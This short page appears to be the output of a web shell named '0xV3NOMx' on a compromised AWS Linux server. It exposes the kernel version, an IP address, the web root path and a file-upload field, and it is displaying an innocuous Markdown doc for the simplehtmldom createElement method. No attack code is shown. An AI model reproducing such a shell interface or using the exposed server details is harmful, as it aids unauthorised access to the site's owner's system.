0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.139.80.194


Current Path : /var/www/website/nublr/Regulations/simplehtmldom/manual/docs/api/HtmlDocument/
Upload File :
Current File : /var/www/website/nublr/Regulations/simplehtmldom/manual/docs/api/HtmlDocument/createElement.md

---
title: createElement
---

```php
createElement ( string $name [, string $value = null ] ) : object
```

Creates a new element.

| Parameter | Description
| --------- | -----------
| `name`    | Name of the element
| `value`   | Value of the element

Returns the element.